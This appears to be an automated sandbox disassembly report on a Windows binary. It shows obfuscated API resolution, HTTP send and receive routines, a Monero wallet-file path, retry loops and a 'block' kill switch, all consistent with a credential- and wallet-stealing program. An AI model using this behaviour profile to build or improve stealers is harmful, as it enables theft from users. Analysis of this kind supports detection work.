                                        • GetProcAddress.KERNEL32(74DD0000,0145CF10), ref: 004FA2C1
                                        • GetProcAddress.KERNEL32(74DD0000,014452D0), ref: 004FA2DA
                                        • GetProcAddress.KERNEL32(74DD0000,0145CE98), ref: 004FA2F2
                                        • GetProcAddress.KERNEL32(74DD0000,0145CFD0), ref: 004FA30A
                                        • GetProcAddress.KERNEL32(74DD0000,014455B0), ref: 004FA323
                                        • GetProcAddress.KERNEL32(74DD0000,01445270), ref: 004FA33B
                                        • LoadLibraryA.KERNEL32(0145D000,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA34D
                                        • LoadLibraryA.KERNEL32(0145D0A8,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA35E
                                        • LoadLibraryA.KERNEL32(0145CE08,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA370
                                        • LoadLibraryA.KERNEL32(0145CEB0,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA382
                                        • LoadLibraryA.KERNEL32(0145D0C0,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA393
                                        • LoadLibraryA.KERNEL32(0145D018,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA3A5
                                        • LoadLibraryA.KERNEL32(0145CEF8,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA3B7
                                        • LoadLibraryA.KERNEL32(0145CDD8,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA3C8
                                        • GetProcAddress.KERNEL32(75290000,01445470), ref: 004FA3EA
                                        • GetProcAddress.KERNEL32(75290000,0145D198), ref: 004FA402
                                        • GetProcAddress.KERNEL32(75290000,014591B0), ref: 004FA41A
                                        • GetProcAddress.KERNEL32(75290000,0145D120), ref: 004FA433
                                        • GetProcAddress.KERNEL32(75290000,01445290), ref: 004FA44B
                                        • GetProcAddress.KERNEL32(73440000,0144B890), ref: 004FA470
                                        • GetProcAddress.KERNEL32(73440000,01445590), ref: 004FA489
                                        • GetProcAddress.KERNEL32(73440000,0144B908), ref: 004FA4A1
                                        • GetProcAddress.KERNEL32(73440000,0145D108), ref: 004FA4B9
                                        • GetProcAddress.KERNEL32(73440000,0145D2E8), ref: 004FA4D2
                                        • GetProcAddress.KERNEL32(73440000,01445230), ref: 004FA4EA
                                        • GetProcAddress.KERNEL32(73440000,014453F0), ref: 004FA502
                                        • GetProcAddress.KERNEL32(73440000,0145D378), ref: 004FA51B
                                        • GetProcAddress.KERNEL32(752C0000,014454D0), ref: 004FA53C
                                        • GetProcAddress.KERNEL32(752C0000,014452B0), ref: 004FA554
                                        • GetProcAddress.KERNEL32(752C0000,0145D300), ref: 004FA56D
                                        • GetProcAddress.KERNEL32(752C0000,0145D360), ref: 004FA585
                                        • GetProcAddress.KERNEL32(752C0000,01445250), ref: 004FA59D
                                        • GetProcAddress.KERNEL32(74EC0000,0144B9A8), ref: 004FA5C3
                                        • GetProcAddress.KERNEL32(74EC0000,0144B9D0), ref: 004FA5DB
                                        • GetProcAddress.KERNEL32(74EC0000,0145D318), ref: 004FA5F3
                                        • GetProcAddress.KERNEL32(74EC0000,014452F0), ref: 004FA60C
                                        • GetProcAddress.KERNEL32(74EC0000,01445310), ref: 004FA624
                                        • GetProcAddress.KERNEL32(74EC0000,0144BA20), ref: 004FA63C
                                        • GetProcAddress.KERNEL32(75BD0000,0145D138), ref: 004FA662
                                        • GetProcAddress.KERNEL32(75BD0000,01445450), ref: 004FA67A
                                        • GetProcAddress.KERNEL32(75BD0000,01459090), ref: 004FA692
                                        • GetProcAddress.KERNEL32(75BD0000,0145D1F8), ref: 004FA6AB
                                        • GetProcAddress.KERNEL32(75BD0000,0145D3C0), ref: 004FA6C3
                                        • GetProcAddress.KERNEL32(75BD0000,01445350), ref: 004FA6DB
                                        • GetProcAddress.KERNEL32(75BD0000,014454B0), ref: 004FA6F4
                                        • GetProcAddress.KERNEL32(75BD0000,0145D390), ref: 004FA70C
                                        • GetProcAddress.KERNEL32(75BD0000,0145D348), ref: 004FA724
                                        • GetProcAddress.KERNEL32(75A70000,01445330), ref: 004FA746
                                        • GetProcAddress.KERNEL32(75A70000,0145D288), ref: 004FA75E
                                        • GetProcAddress.KERNEL32(75A70000,0145D2A0), ref: 004FA776
                                        • GetProcAddress.KERNEL32(75A70000,0145D258), ref: 004FA78F
                                        • GetProcAddress.KERNEL32(75A70000,0145D1E0), ref: 004FA7A7
                                        • GetProcAddress.KERNEL32(75450000,014455D0), ref: 004FA7C8
                                        • GetProcAddress.KERNEL32(75450000,014453B0), ref: 004FA7E1
                                        • GetProcAddress.KERNEL32(75DA0000,01445410), ref: 004FA802
                                        • GetProcAddress.KERNEL32(75DA0000,0145D168), ref: 004FA81A
                                        • GetProcAddress.KERNEL32(6F070000,01445370), ref: 004FA840
                                        • GetProcAddress.KERNEL32(6F070000,01445390), ref: 004FA858
                                        • GetProcAddress.KERNEL32(6F070000,014453D0), ref: 004FA870
                                        • GetProcAddress.KERNEL32(6F070000,0145D150), ref: 004FA889
                                        • GetProcAddress.KERNEL32(6F070000,01445430), ref: 004FA8A1
                                        • GetProcAddress.KERNEL32(6F070000,01445490), ref: 004FA8B9
                                        • GetProcAddress.KERNEL32(6F070000,014454F0), ref: 004FA8D2
                                        • GetProcAddress.KERNEL32(6F070000,01445510), ref: 004FA8EA
                                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 004FA901
                                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 004FA917
                                        • GetProcAddress.KERNEL32(75AF0000,0145D210), ref: 004FA939
                                        • GetProcAddress.KERNEL32(75AF0000,014591D0), ref: 004FA951
                                        • GetProcAddress.KERNEL32(75AF0000,0145D330), ref: 004FA969
                                        • GetProcAddress.KERNEL32(75AF0000,0145D180), ref: 004FA982
                                        • GetProcAddress.KERNEL32(75D90000,01445530), ref: 004FA9A3
                                        • GetProcAddress.KERNEL32(6CFC0000,0145D2B8), ref: 004FA9C4
                                        • GetProcAddress.KERNEL32(6CFC0000,01445550), ref: 004FA9DD
                                        • GetProcAddress.KERNEL32(6CFC0000,0145D1B0), ref: 004FA9F5
                                        • GetProcAddress.KERNEL32(6CFC0000,0145D3A8), ref: 004FAA0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: aa0b7220340a3da2c2379b8d8ee91f217347e71a6e0b70759606eda604194bd2
                                        • Instruction ID: 9dbe51c0d546eba3ecea04c3eda08db690e8fee53f672857de341963c38ddab3
                                        • Opcode Fuzzy Hash: aa0b7220340a3da2c2379b8d8ee91f217347e71a6e0b70759606eda604194bd2
                                        • Instruction Fuzzy Hash: 8C62EDB56181089FC748DFA8ED88F667BB9B7CD601710C71AFA09D32B0D63DA541CB68
                                        Function 004E48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 801 4e48d0-4e4992 call 4faab0 call 4e4800 call 4faa50 * 5 InternetOpenA StrCmpCA 816 4e499b-4e499f 801->816 817 4e4994 801->817 818 4e4f1b-4e4f43 InternetCloseHandle call 4fade0 call 4ea210 816->818 819 4e49a5-4e4b1d call 4f8cf0 call 4fac30 call 4fabb0 call 4fab10 * 2 call 4facc0 call 4fabb0 call 4fab10 call 4facc0 call 4fabb0 call 4fab10 call 4fac30 call 4fabb0 call 4fab10 call 4facc0 call 4fabb0 call 4fab10 call 4facc0 call 4fabb0 call 4fab10 call 4facc0 call 4fac30 call 4fabb0 call 4fab10 * 2 InternetConnectA 816->819 817->816 829 4e4f45-4e4f7d call 4fab30 call 4facc0 call 4fabb0 call 4fab10 818->829 830 4e4f82-4e4ff2 call 4f8b20 * 2 call 4faab0 call 4fab10 * 8 818->830 819->818 905 4e4b23-4e4b27 819->905 829->830 906 4e4b29-4e4b33 905->906 907 4e4b35 905->907 908 4e4b3f-4e4b72 HttpOpenRequestA 906->908 907->908 909 4e4f0e-4e4f15 InternetCloseHandle 908->909 910 4e4b78-4e4e78 call 4facc0 call 4fabb0 call 4fab10 call 4fac30 call 4fabb0 call 4fab10 call 4facc0 call 4fabb0 call 4fab10 call 4facc0 call 4fabb0 call 4fab10 call 4facc0 call 4fabb0 call 4fab10 call 4facc0 call 4fabb0 call 4fab10 call 4fac30 call 4fabb0 call 4fab10 call 4facc0 call 4fabb0 call 4fab10 call 4facc0 call 4fabb0 call 4fab10 call 4fac30 call 4fabb0 call 4fab10 call 4facc0 call 4fabb0 call 4fab10 call 4facc0 call 4fabb0 call 4fab10 call 4facc0 call 4fabb0 call 4fab10 call 4facc0 call 4fabb0 call 4fab10 call 4fac30 call 4fabb0 call 4fab10 call 4faa50 call 4fac30 * 2 call 4fabb0 call 4fab10 * 2 call 4fade0 lstrlen call 4fade0 * 2 lstrlen call 4fade0 HttpSendRequestA 908->910 909->818 1021 4e4e82-4e4eac InternetReadFile 910->1021 1022 4e4eae-4e4eb5 1021->1022 1023 4e4eb7-4e4f09 InternetCloseHandle call 4fab10 1021->1023 1022->1023 1024 4e4eb9-4e4ef7 call 4facc0 call 4fabb0 call 4fab10 1022->1024 1023->909 1024->1021
                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004E4889
                                          • Part of subcall function 004E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004E4899
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004E4965
                                        • StrCmpCA.SHLWAPI(?,0145E888), ref: 004E498A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004E4B0A
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00500DDE,00000000,?,?,00000000,?,",00000000,?,0145E918), ref: 004E4E38
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004E4E54
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004E4E68
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004E4E99
                                        • InternetCloseHandle.WININET(00000000), ref: 004E4EFD
                                        • InternetCloseHandle.WININET(00000000), ref: 004E4F15
                                        • HttpOpenRequestA.WININET(00000000,0145E908,?,0145E208,00000000,00000000,00400100,00000000), ref: 004E4B65
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • InternetCloseHandle.WININET(00000000), ref: 004E4F1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: d8739a689c47bfac3079790f351947aae6803c88caa32ef3332a0c6c988d5dbe
                                        • Instruction ID: fd3616689f2e976625299860f9974def74d1589aa1157c7313664cb0e269c62e
                                        • Opcode Fuzzy Hash: d8739a689c47bfac3079790f351947aae6803c88caa32ef3332a0c6c988d5dbe
                                        • Instruction Fuzzy Hash: 8C12EEB291011C9ACB14EB91DD66FFEB739BF54304F10419EB20A62091DF787B58CB6A
                                        Function 004F5760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1090 4f5760-4f57c7 call 4f5d20 call 4fab30 * 3 call 4faa50 * 4 1106 4f57cc-4f57d3 1090->1106 1107 4f5827-4f589c call 4faa50 * 2 call 4e1590 call 4f5510 call 4fabb0 call 4fab10 call 4fade0 StrCmpCA 1106->1107 1108 4f57d5-4f5806 call 4fab30 call 4faab0 call 4e1590 call 4f5440 1106->1108 1134 4f58e3-4f58f9 call 4fade0 StrCmpCA 1107->1134 1138 4f589e-4f58de call 4faab0 call 4e1590 call 4f5440 call 4fabb0 call 4fab10 1107->1138 1123 4f580b-4f5822 call 4fabb0 call 4fab10 1108->1123 1123->1134 1139 4f58ff-4f5906 1134->1139 1140 4f5a2c-4f5a94 call 4fabb0 call 4fab30 * 2 call 4e16b0 call 4fab10 * 4 call 4e1670 call 4e1550 1134->1140 1138->1134 1142 4f590c-4f5913 1139->1142 1143 4f5a2a-4f5aaf call 4fade0 StrCmpCA 1139->1143 1271 4f5d13-4f5d16 1140->1271 1146 4f596e-4f59e3 call 4faa50 * 2 call 4e1590 call 4f5510 call 4fabb0 call 4fab10 call 4fade0 StrCmpCA 1142->1146 1147 4f5915-4f5969 call 4fab30 call 4faab0 call 4e1590 call 4f5440 call 4fabb0 call 4fab10 1142->1147 1161 4f5ab5-4f5abc 1143->1161 1162 4f5be1-4f5c49 call 4fabb0 call 4fab30 * 2 call 4e16b0 call 4fab10 * 4 call 4e1670 call 4e1550 1143->1162 1146->1143 1250 4f59e5-4f5a25 call 4faab0 call 4e1590 call 4f5440 call 4fabb0 call 4fab10 1146->1250 1147->1143 1168 4f5bdf-4f5c64 call 4fade0 StrCmpCA 1161->1168 1169 4f5ac2-4f5ac9 1161->1169 1162->1271 1198 4f5c78-4f5ce1 call 4fabb0 call 4fab30 * 2 call 4e16b0 call 4fab10 * 4 call 4e1670 call 4e1550 1168->1198 1199 4f5c66-4f5c71 Sleep 1168->1199 1175 4f5acb-4f5b1e call 4fab30 call 4faab0 call 4e1590 call 4f5440 call 4fabb0 call 4fab10 1169->1175 1176 4f5b23-4f5b98 call 4faa50 * 2 call 4e1590 call 4f5510 call 4fabb0 call 4fab10 call 4fade0 StrCmpCA 1169->1176 1175->1168 1176->1168 1274 4f5b9a-4f5bda call 4faab0 call 4e1590 call 4f5440 call 4fabb0 call 4fab10 1176->1274 1198->1271 1199->1106 1250->1143 1274->1168
                                        APIs
                                          • Part of subcall function 004FAB30: lstrlen.KERNEL32(004E4F55,?,?,004E4F55,00500DDF), ref: 004FAB3B
                                          • Part of subcall function 004FAB30: lstrcpy.KERNEL32(00500DDF,00000000), ref: 004FAB95
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004F5894
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004F58F1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004F5AA7
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004F5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004F5478
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004F5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004F5568
                                          • Part of subcall function 004F5510: lstrlen.KERNEL32(00000000), ref: 004F557F
                                          • Part of subcall function 004F5510: StrStrA.SHLWAPI(00000000,00000000), ref: 004F55B4
                                          • Part of subcall function 004F5510: lstrlen.KERNEL32(00000000), ref: 004F55D3
                                          • Part of subcall function 004F5510: lstrlen.KERNEL32(00000000), ref: 004F55FE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004F59DB
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004F5B90
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004F5C5C
                                        • Sleep.KERNEL32(0000EA60), ref: 004F5C6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: 527c3931fc5216330ccf16e8c6baab911b66ab2067c71e40c9113e95059eb85b
                                        • Instruction ID: 002bd75e6ebe7adb21996d1a36b31eb6b65ccc10501656eb28a23febf25fc14d
                                        • Opcode Fuzzy Hash: 527c3931fc5216330ccf16e8c6baab911b66ab2067c71e40c9113e95059eb85b
                                        • Instruction Fuzzy Hash: 78E140B19101089BCB14FBA1DCA6EFD7739AF54304F40855EB70A56095EF3C6A1CCB5A
                                        Function 004F19F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1301 4f19f0-4f1a1d call 4fade0 StrCmpCA 1304 4f1a1f-4f1a21 ExitProcess 1301->1304 1305 4f1a27-4f1a41 call 4fade0 1301->1305 1309 4f1a44-4f1a48 1305->1309 1310 4f1a4e-4f1a61 1309->1310 1311 4f1c12-4f1c1d call 4fab10 1309->1311 1313 4f1bee-4f1c0d 1310->1313 1314 4f1a67-4f1a6a 1310->1314 1313->1309 1316 4f1acf-4f1ae0 StrCmpCA 1314->1316 1317 4f1aad-4f1abe StrCmpCA 1314->1317 1318 4f1a85-4f1a94 call 4fab30 1314->1318 1319 4f1b63-4f1b74 StrCmpCA 1314->1319 1320 4f1b82-4f1b93 StrCmpCA 1314->1320 1321 4f1b41-4f1b52 StrCmpCA 1314->1321 1322 4f1ba1-4f1bb2 StrCmpCA 1314->1322 1323 4f1bc0-4f1bd1 StrCmpCA 1314->1323 1324 4f1b1f-4f1b30 StrCmpCA 1314->1324 1325 4f1bdf-4f1be9 call 4fab30 1314->1325 1326 4f1afd-4f1b0e StrCmpCA 1314->1326 1327 4f1a99-4f1aa8 call 4fab30 1314->1327 1328 4f1a71-4f1a80 call 4fab30 1314->1328 1332 4f1aee-4f1af1 1316->1332 1333 4f1ae2-4f1aec 1316->1333 1330 4f1aca 1317->1330 1331 4f1ac0-4f1ac3 1317->1331 1318->1313 1340 4f1b76-4f1b79 1319->1340 1341 4f1b80 1319->1341 1342 4f1b9f 1320->1342 1343 4f1b95-4f1b98 1320->1343 1338 4f1b5e 1321->1338 1339 4f1b54-4f1b57 1321->1339 1344 4f1bbe 1322->1344 1345 4f1bb4-4f1bb7 1322->1345 1347 4f1bdd 1323->1347 1348 4f1bd3-4f1bd6 1323->1348 1336 4f1b3c 1324->1336 1337 4f1b32-4f1b35 1324->1337 1325->1313 1334 4f1b1a 1326->1334 1335 4f1b10-4f1b13 1326->1335 1327->1313 1328->1313 1330->1313 1331->1330 1352 4f1af8 1332->1352 1333->1352 1334->1313 1335->1334 1336->1313 1337->1336 1338->1313 1339->1338 1340->1341 1341->1313 1342->1313 1343->1342 1344->1313 1345->1344 1347->1313 1348->1347 1352->1313
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 004F1A15
                                        • ExitProcess.KERNEL32 ref: 004F1A21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: be48dbc725b2196a6f2b12591ed6e9657e1afc6dd8b9150520c9530468d22931
                                        • Instruction ID: 9f330bdcaee2a837e246a227dff2deeb200a95e3d7c337fe34e347d808e08556
                                        • Opcode Fuzzy Hash: be48dbc725b2196a6f2b12591ed6e9657e1afc6dd8b9150520c9530468d22931
                                        • Instruction Fuzzy Hash: DF514F75A0420DEBCB04DF94D984FBE77B9FF44304F10404AE606AB2A0E778E951DB6A
                                        Function 004F6C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,01452440), ref: 004F9BF1
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014521D0), ref: 004F9C0A
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,01452218), ref: 004F9C22
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014521A0), ref: 004F9C3A
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014522C0), ref: 004F9C53
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014590A0), ref: 004F9C6B
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014456F0), ref: 004F9C83
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,01445630), ref: 004F9C9C
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014521B8), ref: 004F9CB4
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014522F0), ref: 004F9CCC
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014521E8), ref: 004F9CE5
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,01452230), ref: 004F9CFD
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,01445850), ref: 004F9D15
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014522A8), ref: 004F9D2E
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
